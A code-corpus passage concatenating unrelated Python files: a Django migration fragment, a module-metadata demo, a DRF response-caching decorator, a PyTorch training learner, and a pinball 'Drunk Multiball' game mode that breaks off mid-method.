        # ('type_uuid=...'), not a uuid.UUID -- looks like generated residue of
        # a model-level mistake; verify the Type model's default.
        migrations.AlterField(
            model_name='type',
            name='unique_id',
            field=models.CharField(default='type_uuid=03a13896-3244-4c77-83ec-a5462bc802e5', max_length=128, unique=True, verbose_name='唯一标识符'),
        ),
    ]
| StarcoderdataPython |
1793754 | <gh_stars>0
# Demo script: prints this module's built-in metadata attributes and, by
# importing sub.p13 first, shows how the same attributes differ for an
# imported module versus the entry-point script.
import sub.p13

print('name:' + __name__)
# NoneType is also falsy, so ``or`` supplies the fallback string below.
print('package:' + (__package__ or 'no package'))
print('doc:' + (__doc__ or 'no doc'))
print('file:' + __file__)

# Output for the imported module:
# name:sub.p13
# package:sub
# doc:
# this is sub.p13
# file:D:\SourceCode\python\zsq.LearningPython\class-py\sub\p13.py

# The executed p6.py file is the entry-point script.
# The entry file's __name__ is __main__, like C#'s main entry method.
# name:__main__
# The entry file does not belong to any package.
# package:no package
# doc:no doc
# The entry file's __file__ shows the invocation path, not the physical path.
# file:.\p6.py
3245935 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
# from django.utils.decorators import available_attrs
from functools import WRAPPER_ASSIGNMENTS, wraps
from django.core.cache import cache as dj_cache
from drf_cache.cache_helper import RedisCacheVersion
from drf_cache.cache_key import DefaultKeyGenerator
log = logging.getLogger("drf_cache")
class CacheRestApiResponse(object):
    """Decorator for DRF view methods that caches rendered responses.

    With ``follow_seed=True`` the cached entry is additionally validated
    against a per-resource "seed" version kept by RedisCacheVersion, so a
    write elsewhere can invalidate reads without deleting cache entries.
    """

    def __init__(self,
                 resource_name=None,
                 resource_type="L",
                 key_func=None,
                 cache=None,
                 timeout=None,
                 cache_errors=False,
                 follow_seed=True):
        # Default TTL is 10 minutes when none is supplied.
        if timeout is None:
            self.timeout = 600
        else:
            self.timeout = timeout
        self.key_func = key_func or DefaultKeyGenerator()
        if cache:
            self.cache = cache
        else:
            self.cache = dj_cache
        # Whether responses with status >= 400 are cached as well.
        self.cache_errors = cache_errors
        self.cache_helper = RedisCacheVersion()
        self.resource_name = resource_name
        # "L" presumably denotes a list-type resource -- TODO confirm against
        # RedisCacheVersion's conventions.
        self.resource_type = resource_type
        self.follow_seed = follow_seed

    def __call__(self, func):
        # Inside ``inner`` the name ``self`` is the *view instance*; the
        # decorator object is captured as ``this``.
        this = self

        @wraps(func, assigned=WRAPPER_ASSIGNMENTS)
        def inner(self, request, *args, **kwargs):
            return this.process_cache_response(
                view_instance=self,
                view_method=func,
                request=request,
                args=args,
                kwargs=kwargs,
            )

        return inner

    def process_cache_response(self,
                               view_instance,
                               view_method,
                               request,
                               args,
                               kwargs):
        """Serve the response from cache when possible; otherwise render it,
        store it, and (when following the seed) bump the cache version.

        Any exception in the caching path is logged and the view is rendered
        uncached, so caching failures never break the API.
        """
        try:
            # Compute the cache key for this request.
            key = self.calculate_key(
                view_instance=view_instance,
                view_method=view_method,
                request=request,
                args=args,
                kwargs=kwargs)
            if self.follow_seed:
                # Version check: detail views carry the primary key in kwargs.
                if "pk" in kwargs:
                    resource_id = kwargs["pk"]
                else:
                    resource_id = None
                cache_is_new = self.cache_helper.cache_is_new(key,
                                                              self.resource_name,
                                                              resource_id,
                                                              self.resource_type)
                if cache_is_new:
                    # The cached copy is current, so it may be used.
                    # NOTE(review): "cache hit" is logged before cache.get --
                    # an evicted entry still logs a hit even though it is
                    # re-rendered below.
                    log.debug("cache hit by key: %s" % key)
                    response = self.cache.get(key)
                    if not response:
                        response = self.render_response(request, view_instance, view_method, args, kwargs)
                        if not response.status_code >= 400 or self.cache_errors:
                            self.cache.set(key, response, self.timeout)
                else:
                    log.debug("cache not hit: %s" % key)
                    response = self.render_response(request, view_instance, view_method, args, kwargs)
                    if not response.status_code >= 400 or self.cache_errors:
                        self.cache.set(key, response, self.timeout)
                        self.cache_helper.update_cache_version(key, self.resource_name, resource_id,
                                                               self.resource_type)
            else:
                # Plain caching without any version management.
                response = self.cache.get(key)
                if not response:
                    response = self.render_response(request, view_instance, view_method, args, kwargs)
                    if not response.status_code >= 400 or self.cache_errors:
                        self.cache.set(key, response, self.timeout)
        except Exception as e:
            log.exception(e)
            response = self.render_response(request, view_instance, view_method, args, kwargs)
        # Django's response machinery expects this attribute; a response pulled
        # from the cache may have lost it during serialization.
        if not hasattr(response, "_closable_objects"):
            response._closable_objects = []
        return response

    def render_response(self, request,
                        view_instance, view_method,
                        args, kwargs):
        """Execute the wrapped view and fully render the response so it can be
        stored in the cache."""
        response = view_method(view_instance, request, *args, **kwargs)
        response = view_instance.finalize_response(request, response, *args, **kwargs)
        response.render()
        return response

    def calculate_key(self,
                      view_instance,
                      view_method,
                      request,
                      args,
                      kwargs):
        """Delegate cache-key computation to the configured key function."""
        cache_key = self.key_func(
            view_instance=view_instance,
            view_method=view_method,
            request=request,
            args=args,
            kwargs=kwargs
        )
        return cache_key
class UpdateCacheSeedVersion(object):
    """Decorator for DRF write views that bumps the Redis "seed" version of a
    resource after a successful create (HTTP 201), so cached reads produced by
    CacheRestApiResponse are invalidated."""

    def __init__(self,
                 resource_name=None,
                 resource_type="L", ):
        self.cache_helper = RedisCacheVersion()
        self.resource_name = resource_name
        # "L" presumably denotes a list-type resource -- TODO confirm against
        # RedisCacheVersion's conventions.
        self.resource_type = resource_type

    def __call__(self, func):
        # Inside ``inner`` the name ``self`` is the *view instance*; the
        # decorator object is captured as ``this``.
        this = self

        @wraps(func, assigned=WRAPPER_ASSIGNMENTS)
        def inner(self, request, *args, **kwargs):
            return this.update_cache_version(
                view_instance=self,
                view_method=func,
                request=request,
                args=args,
                kwargs=kwargs,
            )

        return inner

    def update_cache_version(self,
                             view_instance,
                             view_method,
                             request,
                             args,
                             kwargs):
        """Run the wrapped view and, on a 201 response, bump the seed version.

        FIX: renamed from the misspelled ``update_cahce_version``; the old
        name is kept as an alias below for backward compatibility.
        """
        response = view_method(view_instance, request, *args, **kwargs)
        if response:
            if response.status_code == 201:
                # Detail views carry the primary key in kwargs.
                if "pk" in kwargs:
                    resource_id = kwargs["pk"]
                else:
                    resource_id = None
                self.cache_helper.update_seed_version(self.resource_name, resource_id, self.resource_type)
                # A change to a single object must also invalidate the whole
                # list view for that resource.
                if resource_id:
                    self.cache_helper.update_seed_version(self.resource_name, None, "L")
        return response

    # Backward-compatible alias for the old, misspelled method name.
    update_cahce_version = update_cache_version
# Public snake_case aliases for the decorator classes above.
cache_rest_api_response = CacheRestApiResponse
update_seed_version = UpdateCacheSeedVersion
| StarcoderdataPython |
3363142 | <filename>Learner/cvx_learner.py
import time
import os
import sys
import torch
from torch import optim
from Learner.base_learner import BaseLearner
from CustomOptimizer.cvx import CVXOptimizer
class CVXLearner(BaseLearner):
    """Learner that trains a model with the CVX optimizer wrapper.

    Requires 'train_cvx' in ``configs['mode']``; the loss is built with
    ``reduction='none'`` so the optimizer receives a per-sample loss vector
    instead of a scalar.
    """

    def __init__(self, model, time_data, file_path, configs):
        super(CVXLearner, self).__init__(model, time_data, file_path, configs)
        if 'train_cvx' in configs['mode']:
            reduction = 'none'
            # Wrap the base optimizer so gradients can be combined per-sample.
            self.optimizer = CVXOptimizer(self.optimizer)
        else:
            raise NotImplementedError
        # Rebuild the criterion with vector (unreduced) output.
        self.criterion = self.criterion.__class__(reduction=reduction)  # grad vector (no scalar)
        # Per-run output directory for saved artifacts.
        if os.path.exists(os.path.join(self.making_path, time_data)) == False:
            os.mkdir(os.path.join(self.making_path, time_data))

    def run(self):
        """Full training loop: train/eval each epoch, log to TensorBoard,
        early-stop on eval loss, and return the configs from save_grad."""
        print("Training {} epochs".format(self.configs['epochs']))
        best_accuracy = 0.0
        # Train
        for epoch in range(1, self.configs['epochs'] + 1):
            print('Learning rate: {}'.format(self.scheduler.optimizer.param_groups[0]['lr']))
            train_metric = self._train(epoch)
            eval_metric = self._eval()
            self.scheduler.step()
            loss_dict = {'train': train_metric['loss'], 'eval': eval_metric['loss']}
            accuracy_dict = {'train': train_metric['accuracy'], 'eval': eval_metric['accuracy']}
            self.logWriter.add_scalars('loss', loss_dict, epoch)
            self.logWriter.add_scalars('accuracy', accuracy_dict, epoch)
            best_accuracy = max(eval_metric['accuracy'], best_accuracy)
            # Early stopping watches the eval loss.
            self.early_stopping(eval_metric['loss'], self.model)
            if self.early_stopping.early_stop:
                print("Early stopping")
                break
            if self.device == 'gpu':
                torch.cuda.empty_cache()
        print("Best Accuracy: " + str(best_accuracy))
        self.configs['train_end_epoch'] = epoch
        configs = self.save_grad(epoch)
        return configs

    def _train(self, epoch):
        """One training epoch; returns {'accuracy': %, 'loss': mean loss}."""
        tik = time.time()
        self.model.train()  # switch the model to train mode
        running_loss = 0.0
        total_len_data = 0
        len_data = dict()
        class_correct_dict = dict()
        # Per-class counters for correct predictions and sample counts.
        for i in range(self.configs['num_classes']):
            class_correct_dict[i] = 0
            len_data[i] = 0
        current_len_data = 0
        total_len_data = len(self.train_loader.dataset)
        for idx, (data, target) in enumerate(self.train_loader):
            data, target = data.to(self.device), target.to(self.device)  # move batch to the device
            output = self.model(data)
            # Unreduced loss: one value per sample (reduction='none').
            loss = self.criterion(output, target)
            pred = output.argmax(dim=1, keepdim=True)
            for class_idx in target.unique():
                class_correct_dict[int(class_idx)] += pred.eq(target.view_as(pred))[target == class_idx].sum().item()
                len_data[int(class_idx)] += (target == class_idx).sum()
            running_loss += loss.mean().item()
            self.optimizer.zero_grad()
            # CVX-specific backward pass on the per-sample loss vector.
            self.optimizer.cvx_backward(loss)
            self.optimizer.step()
            current_len_data += target.size()[0]
            if idx % self.log_interval == 0:
                print('\r Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, current_len_data, total_len_data,
                                                                                  100.0 * float(current_len_data) / float(total_len_data), loss.mean().item()), end='')
        tok = time.time()
        if self.configs['log_extraction'] == 'true':
            sys.stdout.flush()
        print("\n ============================\nTrain Learning Time:{:.2f}s \t Class Accuracy".format(tok - tik))
        total_correct = 0
        # NOTE(review): divides by len_data[class]; a class absent from the
        # epoch's batches would divide by zero -- confirm the loader always
        # yields every class.
        for class_correct_key in class_correct_dict.keys():
            class_accur = 100.0 * float(class_correct_dict[class_correct_key]) / float(len_data[class_correct_key])
            print('{} class :{}/{} {:2f}%'.format(class_correct_key, class_correct_dict[class_correct_key], len_data[class_correct_key], class_accur))
            total_correct += class_correct_dict[class_correct_key]
        running_accuracy = 100.0 * float(total_correct) / float(total_len_data)
        train_metric = {'accuracy': running_accuracy, 'loss': running_loss / float(total_len_data)}
        print('{} epoch Total Accuracy: {:.2f}%, Total Loss: {}\n'.format(epoch, train_metric['accuracy'], train_metric['loss']))
        return train_metric

    def _eval(self):
        """Evaluate on the test loader; returns {'accuracy': %, 'loss': mean loss}."""
        self.model.eval()
        eval_loss = 0
        correct = 0
        class_correct_dict = dict()
        class_total_dict = dict()
        for i in range(self.configs['num_classes']):
            class_correct_dict[i] = 0
            class_total_dict[i] = 0
        with torch.no_grad():
            for data, target in self.test_loader:
                data, target = data.to(self.device), target.to(self.device)
                output = self.model(data)
                loss = self.criterion(output, target)
                eval_loss += loss.mean().item()
                # get the index of the max log-probability
                pred = output.argmax(dim=1, keepdim=True)
                for label in target.unique():
                    # print(label,pred.eq(target.view_as(pred))[target==label].sum().item())
                    class_correct_dict[int(label)] += pred.eq(target.view_as(pred))[target == label].sum().item()
                    class_total_dict[int(label)] += (target == label).sum().item()
        eval_loss = eval_loss / len(self.test_loader.dataset)
        correct = 0
        print("=================Eval=================")
        for class_correct_key in class_correct_dict.keys():
            correct += class_correct_dict[class_correct_key]
            class_accur = 100.0 * float(class_correct_dict[class_correct_key]) / class_total_dict[class_correct_key]
            print('{} class :{}/{} {:2f}%'.format(class_correct_key, class_correct_dict[class_correct_key], class_total_dict[class_correct_key], class_accur))
        print('Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n==================='.format(
            eval_loss, correct, len(self.test_loader.dataset),
            100.0 * correct / float(len(self.test_loader.dataset))))
        if self.configs['log_extraction'] == 'true':
            sys.stdout.flush()
        eval_accuracy = 100.0 * correct / float(len(self.test_loader.dataset))
        eval_metric = {'accuracy': eval_accuracy, 'loss': eval_loss}
        return eval_metric
| StarcoderdataPython |
3381548 | ## ____ _ ____
## / ___|__ _ ___| |_ _ _ ___ / ___|__ _ _ __ _ _ ___ _ __
## | | / _` |/ __| __| | | / __| | | / _` | '_ \| | | |/ _ \| '_ \
## | |__| (_| | (__| |_| |_| \__ \ | |__| (_| | | | | |_| | (_) | | | |
## \____\__,_|\___|\__|\__,_|___/ \____\__,_|_| |_|\__, |\___/|_| |_|
## |___/
## ___ ___ _ _ _____ ___ _ _ _ _ ___ ___
## / __/ _ \| \| |_ _|_ _| \| | | | | __| \
## | (_| (_) | .` | | | | || .` | |_| | _|| |) |
## \___\___/|_|\_| |_| |___|_|\_|\___/|___|___/
##
## A P-ROC Project by <NAME>, Copyright 2012-2013
## Built on the PyProcGame Framework from <NAME> and <NAME>
## Original Cactus Canyon software by <NAME>
##
##
## The Drunk Multiball
##
## basic gist
## inverted flippers
## hitting the beer mug lights jackpots
## after collecting jackpots, or maybe after all 5 are lit, shooting the saloon should do something
from procgame import dmd,game
import ep
import random
class DrunkMultiball(ep.EP_Mode):
"""Drunk multiball mode ... """
    def __init__(self, game, priority):
        """Set up display layers, shot tables and user-setting flags for the
        Drunk Multiball mode."""
        super(DrunkMultiball, self).__init__(game, priority)
        self.myID = "Drunk Multiball"
        # Looping idle overlay shown behind the score during the mode.
        anim = self.game.assets.dmd_dmbIdle
        self.overlay = dmd.AnimatedLayer(frames=anim.frames, hold=False, opaque=False, repeat=True, frame_time=8)
        # Lamp modes indexed by shot (same order the switch handlers use).
        self.shotModes = [self.game.lamp_control.left_loop, self.game.lamp_control.right_loop, self.game.lamp_control.left_ramp, self.game.lamp_control.center_ramp, self.game.lamp_control.right_ramp]
        self.shots = ['leftLoopStage', 'leftRampStage', 'centerRampStage', 'rightLoopStage', 'rightRampStage']
        # Jackpot shots not yet lit this game.
        self.availableJackpots = ['leftLoop', 'leftRamp', 'centerRamp', 'rightLoop', 'rightRamp']
        # an animation for use in the intro
        anim = self.game.assets.dmd_reverse
        self.underLayer = dmd.AnimatedLayer(frames=anim.frames, hold=True, opaque=False, repeat=False)
        # True while the intro/banner sequence is playing.
        self.starting = False
        # Operator settings: GI-off during the mode, and whether the mode runs at all.
        self.giOff = 'Disabled' == self.game.user_settings['Gameplay (Feature)']['Drunk Multiball GI']
        self.enabled = 'Enabled' == self.game.user_settings['Gameplay (Feature)']['Drunk Multiball']
        # Debounce flag for the beer-mug switch.
        self.beerHit = False
        # Currently-lit jackpot shots.
        self.active = []
        # Set once play has dropped back to a single ball.
        self.downToOne = False
def mode_started(self):
if not self.enabled:
# Drunk multiball is disabled, do the bonus instead
self.drunk_bonus()
else:
# fire up the switch block if it's not already loaded
self.game.switch_blocker('add',self.myID)
# reset the jackpots
self.active = []
self.downToOne = False
self.jackpotValue = 2000000
self.jackpotIncrement = 100000
self.beerHit = False
self.jackpot_count = 0
    def ball_drained(self):
        """Drain hook: manage the end of multiball as balls are lost."""
        # if we're dropping down to one ball, and drunk multiball is running - do stuff
        if self.game.trough.num_balls_in_play == 1 and self.game.show_tracking('drunkMultiballStatus') == "RUNNING":
            self.downToOne = True
            self.end_save()
        if self.game.trough.num_balls_in_play == 0 and self.game.show_tracking('drunkMultiballStatus') == "RUNNING":
            # if we made it down to one ball before now, end normally - but if not, kick out a new ball
            if not self.downToOne:
                # Both balls drained at once: keep the player alive with a fresh ball.
                self.game.trough.launch_balls(1)
                self.downToOne = True
                self.end_save()
            else:
                # Last ball gone: flag the base handler busy and wind the mode down.
                self.game.base.busy = True
                self.game.base.queued += 1
                self.end_drunk()
    ### switches
    # Each playfield shot routes through process_shot with its lamp mode.
    def sw_leftLoopTop_active(self, sw):
        self.process_shot('leftLoop', self.shotModes[0])

    def sw_leftRampEnter_active(self, sw):
        self.process_shot('leftRamp', self.shotModes[2])

    def sw_centerRampMake_active(self, sw):
        self.process_shot('centerRamp', self.shotModes[3])

    def sw_rightLoopTop_active(self, sw):
        # Ignore the loop switch while the Bart toy is in motion.
        if not self.game.bart.moving:
            self.process_shot('rightLoop', self.shotModes[1])

    def sw_rightRampMake_active(self, sw):
        self.process_shot('rightRamp', self.shotModes[4])

    def process_shot(self, shot, mode):
        """Award a jackpot when the shot is lit, otherwise a small score."""
        if shot in self.active:
            self.collect_jackpot(shot, mode)
        else:
            self.game.score(2530)

    # beer mug lights jackpots
    def sw_beerMug_active(self, sw):
        """Beer-mug target: scores, audits, and lights a jackpot if any remain."""
        if self.beerHit:
            # Debounced duplicate hit - swallow it.
            pass
        else:
            self.beerHit = True
            # delay to re-allow due to debounce being off
            self.delay(delay=0.050, handler=self.beer_unhit)
            self.game.score(27500)
            # audit
            self.game.game_data['Feature']['Drunk MB Beers'] += 1
            if self.availableJackpots:
                self.light_jackpot()
            else:
                pass
            if not self.game.lamp_control.lights_out:
                self.game.lamps.beerMug.schedule(0x00000CCC, cycle_seconds=1)
                self.delay(delay=1, handler=self.flash_mug)
        return game.SwitchStop

    def beer_unhit(self):
        # Re-arm the mug after the manual debounce window.
        self.beerHit = False

    def flash_mug(self):
        # Steady attract flash on the mug lamp (skipped when GI is dark).
        if not self.game.lamp_control.lights_out:
            self.game.lamps.beerMug.schedule(0xFF00FF00)

    # if it lands in the mine, just kick it out
    def sw_minePopper_active_for_390ms(self, sw):
        self.game.score(2530)
    def start_drunk(self):
        """Kick off the mode: set tracking/flags, invert the flippers, switch
        the lights and music, then show the banner sequence."""
        #print "STARTING DRUNK ASS MULTIBALL"
        # audit
        self.game.game_data['Feature']['Drunk MB Started'] += 1
        self.running = True
        # set the stack level
        self.game.stack_level(3, True)
        # update the tracking
        self.game.set_tracking('drunkMultiballStatus', "RUNNING")
        # disable the flippers
        self.game.enable_flippers(False)
        # enable the inverted flippers (the mode's signature gimmick)
        self.game.enable_inverted_flippers(True)
        # stop the music
        #self.stop_music()
        # turn the GI off - Based on setting
        if self.giOff:
            self.game.gi_control("OFF")
        # update the lamps
        self.lamp_update()
        # play the drunk multiball song
        self.music_on(self.game.assets.music_drunkMultiball)
        # show some screens about the mode
        self.banner()
    def drunk_bonus(self):
        """Consolation award used when the mode is disabled: show a screen,
        score escalating points, then reset the mug state for next time."""
        #print "DMB Disabled, Drunk bonus"
        # grab the point values
        points = self.game.show_tracking('drunkBonusValue')
        # show a screen
        mug = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_beerMug1.frames[0])
        mug.composite_op = "blacksrc"
        words = ep.EP_TextLayer(51, 3, self.game.assets.font_9px_az, "center", opaque=False).set_text("DRUNK BONUS", color=ep.YELLOW)
        score = ep.EP_TextLayer(51, 15, self.game.assets.font_9px_az, "center", opaque=False).set_text(ep.format_score(points), blink_frames=8, color=ep.GREEN)
        combined = dmd.GroupedLayer(128, 32, [words, score, mug])
        self.layer = combined
        self.game.sound.play(self.game.assets.sfx_pour)
        # unload after 2 seconds
        self.delay("Operational", delay=2, handler=self.unload)
        # score some points
        self.game.score(points)
        # increase the text award (next bonus is worth 100k more)
        self.game.set_tracking('drunkBonusValue', (points + 100000))
        # reset the mug hits for next time
        self.game.set_tracking('beerMugHits', 0)
        # tick up the shots needed for next time
        self.game.increase_tracking('mug_shots', self.game.user_settings['Gameplay (Feature)']['Beer Mug Hits Boost'])
        # Eject the ball
        self.game.saloon.kick()
        # reset the DMB status
        self.game.set_tracking('drunkMultiballStatus', "OPEN")
    def banner(self):
        """First banner frame: beer-pour animation over the title art; chains
        to bannerTwo after 1.3s."""
        # set a starting flag
        self.starting = True
        # setup the pour mask
        # load up the animation
        anim = self.game.assets.dmd_pourMask
        # setup the animated layer
        pour = ep.EP_AnimatedLayer(anim)
        pour.hold = True
        pour.frame_time = 6
        pour.composite_op = "blacksrc"
        mug = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_beerMug1.frames[0])
        mug.composite_op = "blacksrc"
        words = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_drunkMultiball.frames[0])
        combined = dmd.GroupedLayer(128, 32, [words, pour, mug])
        self.layer = combined
        self.game.sound.play(self.game.assets.sfx_pour)
        self.delay("Operational", delay=1.3, handler=self.bannerTwo)

    def bannerTwo(self):
        """Second banner frame: title with the full mug plus a voice quote;
        chains into the intro display after 1s."""
        self.game.base.play_quote(self.game.assets.quote_drunkDrinkToThat)
        mug = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_beerMug1.frames[0])
        mug.composite_op = "blacksrc"
        words = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_drunkMultiball.frames[0])
        combined = dmd.GroupedLayer(128, 32, [words, mug])
        self.layer = combined
        self.delay("Operational", delay=1, handler=self.intro_display)
    def intro_display(self, step=1):
        """Animated intro explaining the reversed flippers; re-schedules
        itself once per second through step 6, then hands off to get_going.

        NOTE(review): the delay chain below only ever reaches step 6
        (``step <= 5`` schedules step+1), so the ``step == 7/8/9/10``
        conditions appear unreachable with the current flow -- confirm before
        simplifying.
        """
        ## show some junk about how the mode works
        if step == 1:
            flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
            arrow = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
        elif step == 2 or step == 4 or step == 6 or step == 8 or step == 10:
            # Even steps: flippers "right" pose with an animated right arrow.
            flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers2.frames[0])
            arrowOne = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_rightArrow1.frames[0])
            arrowTwo = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_rightArrow2.frames[0])
            arrowThree = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_rightArrow3.frames[0])
            arrow = dmd.ScriptedLayer(128, 32, [{'seconds': 0.15, 'layer': arrowOne}, {'seconds': 0.15, 'layer': arrowTwo}, {'seconds': 0.15, 'layer': arrowThree}])
            arrow.composite_op = "blacksrc"
        elif step == 3 or step == 5 or step == 7 or step == 9:
            # Odd steps (after 1): flippers "left" pose with an animated left arrow.
            flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers3.frames[0])
            arrowOne = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_leftArrow1.frames[0])
            arrowTwo = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_leftArrow2.frames[0])
            arrowThree = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_leftArrow3.frames[0])
            arrow = dmd.ScriptedLayer(128, 32, [{'seconds': 0.15, 'layer': arrowOne}, {'seconds': 0.15, 'layer': arrowTwo}, {'seconds': 0.15, 'layer': arrowThree}])
            arrow.composite_op = "blacksrc"
        else:
            # just to make the syntax checking happy
            flippers = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
            arrow = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_flippers1.frames[0])
        flippers.composite_op = "blacksrc"
        text = dmd.FrameLayer(opaque=False, frame=self.game.assets.dmd_reverse.frames[0])
        if step == 2:
            self.game.base.play_quote(self.game.assets.quote_drunkNeverSeen)
        if step == 1:
            combined = dmd.GroupedLayer(128, 32, [text, flippers])
        elif step == 2 or step == 3:
            combined = dmd.GroupedLayer(128, 32, [text, flippers, arrow])
        else:
            combined = dmd.GroupedLayer(128, 32, [self.underLayer, flippers, arrow])
        self.layer = combined
        if step <= 5:
            self.delay("Operational", delay=1, handler=self.intro_display, param=step + 1)
        else:
            self.delay("Operational", delay=1, handler=self.get_going)
def abort_intro(self):
    """Cut the intro sequence short and start multiball play immediately."""
    self.starting = False
    # cancel the pending intro_display/get_going delay chain so it can't fire twice
    self.cancel_delayed("Operational")
    self.get_going()
def get_going(self):
    """Transition from the intro into active multiball play.

    Clears the intro flag, frees the saloon, tops the playfield up to
    three balls, starts a ball save and kicks off the display loop.
    """
    self.starting = False
    # turn off the saloon busy flag - should process check bounty and kick the ball out
    self.game.saloon.busy = False
    # flash the beer mug
    self.flash_mug()
    # eject more ball - top up to 3 balls in play; new balls auto-plunge
    if self.game.trough.num_balls_in_play < 3:
        thisMany = 3 - self.game.trough.num_balls_in_play
        self.game.trough.balls_to_autoplunge = thisMany
        self.game.trough.launch_balls(thisMany)
    # eject the ball in the saloon
    self.game.saloon.kick()
    # start a ball save (20s, may save repeatedly) so early drains don't kill the mode
    self.game.trough.start_ball_save(num_balls_to_save=3, time=20, now=True, allow_multiple_saves=True)
    #self.delay(delay=2,handler=self.dmb_ball_save)
    self.update_display()
def dmb_ball_save(self):
    """Start the multiball ball save.

    Currently unused: get_going() starts the save directly; this remains
    for the commented-out delayed call above it.
    """
    # start a ball save
    self.game.trough.start_ball_save(num_balls_to_save=3, time=20, now=True, allow_multiple_saves=True)
def update_display(self):
    """Render the running multiball status frame.

    Re-schedules itself every 0.2s under the "Display" delay name, so any
    temporary animation can pre-empt it by cancelling "Display" and then
    re-scheduling it when done.
    """
    self.overlay.composite_op = "blacksrc"
    p = self.game.current_player()
    scoreString = ep.format_score(p.score)
    scoreLine = ep.EP_TextLayer(80, 8, self.game.assets.font_7px_az, "center", opaque=False).set_text(scoreString,blink_frames=8,color=ep.YELLOW)
    textLine1 = ep.EP_TextLayer(80, 1, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("DRUNK MULTIBALL",color=ep.ORANGE)
    # self.active holds the currently lit jackpot shots (light_jackpot appends
    # to it); non-empty means jackpots are live, empty means the player still
    # has to hit the beer mug
    if self.active:
        textLine2 = ep.EP_TextLayer(80, 18, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("JACKPOTS",color=ep.BROWN)
        textString = "WORTH " + str(ep.format_score(self.jackpotValue))
        textLine3 = ep.EP_TextLayer(80, 25, self.game.assets.font_5px_AZ, "center", opaque=False).set_text(textString,color=ep.BROWN)
    else:
        textLine2 = ep.EP_TextLayer(80, 18, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("HIT BEER MUG",color=ep.BROWN)
        textLine3 = ep.EP_TextLayer(80, 25, self.game.assets.font_5px_AZ, "center", opaque=False).set_text("TO LIGHT JACKPOTS",color=ep.BROWN)
    combined = dmd.GroupedLayer(128,32,[textLine1,textLine2,textLine3,scoreLine,self.overlay])
    self.layer = combined
    # loop: refresh again in 0.2 seconds
    self.delay(name="Display",delay=0.2,handler=self.update_display)
def light_jackpot(self):
    """Light one randomly-chosen jackpot shot and play the 'jackpot added' show."""
    # pick a jackpot at random from the shots not currently lit
    thisOne = random.choice(self.availableJackpots)
    # take it out of the available pool and make it active (lit)
    self.availableJackpots.remove(thisOne)
    self.active.append(thisOne)
    #print self.active
    # and update the lamps
    self.lamp_update()
    #print "LIGHTING JACKPOT"
    anim = self.game.assets.dmd_dmb
    animLayer = ep.EP_AnimatedLayer(anim)
    animLayer.hold=True
    animLayer.frame_time = 8
    animLayer.composite_op = "blacksrc"
    # drink sound effects synced to animation frames 3 and 5
    animLayer.add_frame_listener(3,self.game.sound.play,param=self.game.assets.sfx_ebDrink)
    animLayer.add_frame_listener(5,self.game.sound.play,param=self.game.assets.sfx_ebDrink)
    animLayer.opaque=False
    words = self.game.assets.dmd_dmbJackpotAdded
    # hold the 'jackpot added' words for the animation length plus a second
    myWait = (len(words.frames) / 10.0) + 1
    wordsLayer = ep.EP_AnimatedLayer(words)
    wordsLayer.add_frame_listener(6,self.game.sound.play,param=self.game.assets.sfx_orchestraSet)
    wordsLayer.hold=True
    wordsLayer.frame_time = 6
    wordsLayer.opaque = True
    combined = dmd.GroupedLayer(128,32,[wordsLayer,animLayer])
    # pre-empt the status loop, show the animation, then resume updates
    self.cancel_delayed("Display")
    self.layer = combined
    self.delay(name="Display",delay=myWait,handler=self.update_display)
def collect_jackpot(self,shot,mode):
    """Award a lit jackpot.

    Args:
        shot: identifier of the jackpot shot that was hit (must be in self.active).
        mode: callable for the hit shot's lamp handling; called with 'Disable'
              here to turn that shot off -- presumably the shot mode's lamp
              updater, confirm with the caller.
    """
    # audit
    self.game.game_data['Feature']['Drunk MB Jackpots'] += 1
    # take it out of active and put it in available
    # count the jackpots hit so far
    self.jackpot_count += 1
    self.active.remove(shot)
    self.availableJackpots.append(shot)
    # update the lamps for the hit ramp
    mode('Disable')
    self.cancel_delayed("GI Reset")
    # flash some lights (three GI strings on offset blink schedules)
    self.game.lamps.gi01.schedule(0xFF00FF00,cycle_seconds=1)
    self.game.lamps.gi02.schedule(0x0FF00FF0,cycle_seconds=1)
    self.game.lamps.gi03.schedule(0x00FF00FF,cycle_seconds=1)
    # turn the GI back on if not set for off
    if not self.giOff:
        self.delay("GI Reset",delay=1,handler=self.game.gi_control,param="ON")
    # score some points -- the 5th jackpot is worth double
    if self.jackpot_count == 5:
        self.game.score((self.jackpotValue * 2))
    else:
        self.game.score(self.jackpotValue)
    # NOTE(review): jackpotEarned (used by the score display) is not doubled
    # on the 5th jackpot even though the score is -- confirm intended.
    self.jackpotEarned = self.jackpotValue
    self.jackpotValue += self.jackpotIncrement
    # load up the animation
    anim = self.game.assets.dmd_beerSlide
    # setup the animated layer
    beerLayer = ep.EP_AnimatedLayer(anim)
    beerLayer.hold=True
    beerLayer.frame_time = 3
    beerLayer.composite_op = "blacksrc"
    anim = self.game.assets.dmd_dmbJackpot
    # setup the animated layer
    wordsLayer = ep.EP_AnimatedLayer(anim)
    wordsLayer.hold=True
    wordsLayer.frame_time = 3
    wordsLayer.composite_op = "blacksrc"
    # guard against compositing over a missing layer
    if self.layer == None:
        self.layer = self.no_layer()
